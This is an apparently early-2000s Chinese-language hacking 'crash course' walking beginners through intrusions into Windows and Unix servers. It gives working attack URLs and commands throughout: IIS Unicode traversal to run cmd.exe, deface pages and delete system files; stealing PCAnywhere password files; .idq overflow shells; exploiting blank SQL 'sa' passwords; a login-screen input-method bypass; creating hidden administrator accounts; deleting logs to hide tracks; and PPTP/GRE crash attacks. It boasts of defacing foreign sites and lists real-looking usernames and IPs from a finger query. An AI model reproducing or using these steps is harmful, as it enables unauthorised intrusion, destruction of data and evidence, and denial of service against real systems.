終于決定要寫下這份速成教材了,好讓一些正準備步入黑客殿堂的朋友和一些正在步入黑客殿堂的朋友可以很快的找到感覺.因為是速成所以里面的一些理論上的東東會被X掉,大家如果要學的話可以找書看看,以下都是攻擊的步驟(不準用在國內的機子

1 UNICODE漏洞
這是老漏洞了,但對于新手來說很好用,而且事實證明現(xiàn)在仍有很多的機子有這種漏洞,OK我們開始
先用掃描器掃到有UNICODE漏洞的機子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當然還有其它的方式, 具體根據你的掃描器掃出的結果為標準
我們在流覽器(IE)的地址欄中輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
這時你可以看到它的系統(tǒng)目錄但我們要的是主頁面放置的目錄
在輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot
看到了吧,目錄中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主頁面,
我們來換它的頁面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe

http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:\inetpub\wwwroot\default.asp
OK
成功了,此時它的主頁面被換成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe 執(zhí)行后是復制,如果換成這個呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:\winnt\system32\cmd.exe
沒錯就是刪除了
知道怎么做了吧
呵呵

2利用PCANWHERE攻擊網站
現(xiàn)在開始入正題了,剛才只是熱身
由于NT的機器一般使用PCAnyWhere進行遠程管理,因此如果能夠得到PCAnyWhere遠程連接的帳號和密碼,那么就能遠程連接到主機。 （ http://fxyong.3322.net/getpwd.zip ）便可以取得帳號和密碼
Telnet IP 5631
我們可以看看PCANYWHERE開了沒
使用Unicode漏洞+ PCanyWhere密碼查看工具
首先我們要DOWN一個可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我們現(xiàn)在要找到主機上的*.CIF文件
在IE中輸入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:\*.cif /s
一般Citempl.cif為系統(tǒng)默認的密碼文件，因此我們需要SA.CIF文件。 復制該文件到網站目錄下。
需要知道網站目錄，可以通過ida,idq漏洞進行得到，也可以去尋找網站中的一個圖片文件，比如Tscontent.gif文件，然后去查找該文件：使用命令 dir c:\ Tscontent.gif /s
比如網站目錄為c:\inetpub\wwwroot\ 一般都有是啦 呵呵
密碼文件所在目錄：c:\Program Files\pcANYWHERE\DATA
下面執(zhí)行Copy命令：
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:\Program Files\pcANYWHERE\DATA\SA.CGI c:\inetpub\wwwroot\
顯示1 file(s) copied，就表示復制成功了。

使用IE下載該文件
使用 http://IP/sa.cif 就可以下載該文件了。

使用PCanyWhere密碼查看工具得到用戶名和密碼

3利用.idq漏洞　　

為了方便大家可以看懂下面說的是什么可以先到這里來看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有兩個版本.一個是GUI版本.一個是命令行版本.
這里我們來說CUI版本,反正都差不多了,關鍵是要多試
首先我們要找到有.IDQ漏洞的機子,可以用流光掃一下
運行軟件
在被攻擊IP地址后面寫上對方的IP.端口號一般不需要改動.
左面選擇操作系統(tǒng)類型.先選擇IIS5 English Win2k Sp0吧~
軟件的默認綁定CMD.EXE的端口是813.不改了.用默認吧~~~
點擊IDQ溢出~~OK~~出現(xiàn)發(fā)送Shellcode成功的提示了.
接著我們用NC,你可以到到盟下載 WWW.CNHONKER.COM
C:\>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK!!!上來了
你現(xiàn)在有SYSTEM權限,不錯吧,該做什么不用我教了吧,比如為自已留下個后門
net user hacker password /add '添加一給名為hacker，密碼為passwod的用戶！
net localgroup administrators hacker /add ' 把剛才創(chuàng)建的用戶加入 Admnistrators組
OK我們在來看看DOS版本
下載軟件后會有個運行文件,它太長了,將它必名為KAWEN
D:\>KAWEN
運行參數: 操作系統(tǒng)類型 目的地址 web端口 溢出端口
支持的操作系統(tǒng) 類型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2

D:\>KAWEN 3 XXX.XXX.XXX.XXX80 456
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發(fā)送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現(xiàn)在，你可以 連接 該主機的 端口 456了,good luck.!

開始吧
D:\>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK

沒成功.試試sp1.
D:\>KAWEN 4 XXX.XXX.XXX.XXX 80 888
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發(fā)送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現(xiàn)在，你可以 連接 該主機的 端口 888了,good luck.!
D:\>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
看看我們又成功了

4 SQL攻擊網站
這個也很方便,呵呵,上次在對美國大戰(zhàn)中也有不少兄弟是用這種方法的,來看看吧
我們需要小榕的流光作為武器,到WWW.NETEYES.COM去DOWN一個
運行流光然后按快捷鍵ctrl＋r搜索！
選擇aql！輸入開始和結束的IP！掃描吧！到搜索結束！察看流光最下面的視圖！格式如下：
用戶名 密碼 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密碼為空！
雙擊其中一項（或在工具……>SQL登錄）！會彈出一個dos窗口！如果過一會該窗口消失！沒戲了！對方不支持遠程登錄！在換一個！如果過一會出現(xiàn)如下的字樣：
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已經登錄上了對方的主機！然后
SQLCmd>net user ‘察看用戶！如果不能察看，說明sa權限不夠，那也沒戲，換其他的方法！或是走人！有時用net user察看成功！再試試
SQLCmd>net user administrator ’察看Admin的情況（可知是否在線）如果失敗，撤退吧，
沒戲，換方法！ 沒有權限,但是如果可以的話
下一步：
SQLCmd>net user hacker password /add '添加一給名為hacker，密碼為passwod的用戶！
SQLCmd>net localgroup administrators hacker /add ' 把剛才創(chuàng)建的用戶加入 Admnistrators組

好了，告一段落，下面啟動DOS用剛創(chuàng)建的用戶進行ipc$
net use \\*.*.*.*\ipc$ "password" /user:"hacker" '很熟悉吧！IPC$開始了！
執(zhí)行成功的話！搞吧！刪除！上傳！下載！要什么！隨你！
例如copy c:\hacker\index.htm \\IP\c$\inetpub\wwwroot\default.htm (IP為它的IP)
干什么，換他的主頁??！呵呵！

據我的實踐！針對臺灣的主機！另一方法是用剛創(chuàng)建的用戶名和密碼用CuteFtp登錄！就象管理自己的站點一樣！任意刪除創(chuàng)建Html頁面！此方法對美國的主機沒有成功過！我都是IPC$搞定的！

以上的原理是用SQL開門！用IPC$進門做作administrator可以作的事！但對于SQL主機！Administrator一般沒有對數據庫刪除或創(chuàng)建的權限！此時可以down下他的sam文件解密(怎么DOWN?暈,看看我在上面UNICODE中寫的教材)！默認用戶名SQLAgentCmdExec，然后用天行的SQlBrowse登錄就可以對數據庫任意操作了！

5 利用輸入法漏洞
要說老美真不是東西,這么大個洞現(xiàn)在還尚存人間,也好,大家可以練練手
1、用端口掃瞄程序掃IP的3389端口，得到xx.xx.xx.xx。

　 2、運行windows2000終端客戶程序，在服務器輸入框里填入：xx.xx.xx.xx ，連接。

　 3、出現(xiàn)windows2000的登陸窗口，按下CTRL+SHIFT鍵，出現(xiàn)全拼輸入法。

　 4、在輸入法狀態(tài)條上按mouse右鍵，選擇幫助，選擇輸入指南，選擇"選項"按右鍵。

　 5、選擇"跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.

　 6、選擇"保存到磁盤"。

　 7、選擇目錄：c:\inetpub\scripts\

　 8、打開IE，輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧）

　 9、輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp

還有一種方法
1.掃描 3389 port 終端服務默認；
2.用終端客戶端程序進行連接；
3.按ctrl+shift調出全拼輸入法（其他似乎不行），點鼠標右鍵（如果其幫助菜單發(fā)灰，就趕快趕下家吧，人家打補丁了），點幫助，點輸入法入門；
4.在"選項"菜單上點右鍵--->跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.（如果不能確定NT系統(tǒng)目錄，則輸入：c:\ 或d:\ ……進行查找確定）；
5.選擇"保存到磁盤" 選擇目錄：c:\inetpub\scripts\，因實際上是對方服務器上文件自身的復制操作，所以這個過程很快就會完成；
6.打開IE，輸入： http://ip/scripts/cmd.exe?/c dir 怎么樣？有cmd.exe文件了吧？這我們就完成了第一步；
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下：

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"菜單上點右鍵--->跳轉到URL"，輸入：c:\inetpub\scripts\go.bat --->在磁盤當前位置執(zhí)行；
12.呵呵，大功告成啦，這樣我們就激活了服務器的geust帳戶，密碼為：elise，超級用戶呢！ （我喜歡guest而不是建立新帳戶，這樣似乎不易被發(fā)現(xiàn)些），
最后一定別不記的X掉自已的腳印
del+C:\winnt\system32\logfiles\*.*
del+C:\winnt\ssytem32\config\*.evt
del+C:\winnt\system32\dtclog\*.*
del+C:\winnt\system32\*.log
del+C:\winnt\system32\*.txt
del+C:\winnt\*.txt
del+C:\winnt\*.log

6 教你DoS攻擊微軟的PPTP
呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什么東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協(xié)議)是一個用以建立VPN的網絡協(xié)議. 此協(xié)議需TCP(端口1723)和GRE以完成工作.
易收攻擊系統(tǒng)：
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0

安全的系統(tǒng)：
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0

如何實現(xiàn)：
~~~~~~~~~
*需要的工具*
1.UNIX box(例如linux,*bsd....)
2.netcat ( http://www.l0pht.com/~weld/netcat/ )
3.apsend ( http://www.elxsi.de/ )
4.ipsend ( http://coombs.anu.edu.au/~avalon/ )

OK,這就好說了,
我們來看它的三個BUG
1 TCP端口1723
此弱點只在prior至SP6的機器上有效。并不是所有的機器都存在這個漏洞；請在Unix 操作系統(tǒng)內鍵入以下：
$ nc 1723 < /dev/zero

如機器存在此漏洞, 目標主機將在幾秒種之內藍屏，并有如下錯誤：
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒，此弱點只對部分機器有效

2 GRE
此弱點對所有Service pack有效
在目標機器上，打開任務管理器選擇“運行”。并打開 一個DOS窗口（開始-運行-CMD).在Unix類操作系統(tǒng)上：
$ apsend -d --protocol 47 -m 0 -q
在目標主機上你將看到任務管理器內內核記憶的數字將緩慢上升。最終，這些數字將停止增加；此時， CPU在一段時間內有可能被100%占用?，F(xiàn)在你可以試著在命令提示符后鍵入一個命令例如DIR,這時你將看 到一個信息說提示操作系統(tǒng)已不可能完成要執(zhí)行的命令

3弱點三：GRE
此弱點同樣對所有的Service pack有效。請在Unix操作系統(tǒng)上：
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目標主機很快會藍屏，大概需要50個數據包。
明白了吧

7 UNIX攻擊
這里為了方便我們用finger 0@ip 來找UNIX的薄弱機器
C:\>finger 0@IP
xxx.xxx.xxx.xxx]

Login Name TTY Idle When Where

daemon ??? < . . . . >

bin ??? < . . . . >

sys ??? < . . . . >

jeffrey ??? pts/0 203.66.149.11

daniel ??? 437 114cm.kcable.

jamie ??? 0 203.66.162.68

postgres ??? pts/2 203.66.162.80

nsadmin ??? 768 203.66.19.50

ho ??? 390 61.169.209.106

house18 ??? pts/1 203.66.250.1

tong ??? pts/0 210.226. 42.69

jliu ??? pts/0 203.66.52.87

ptai ??? < . . . . >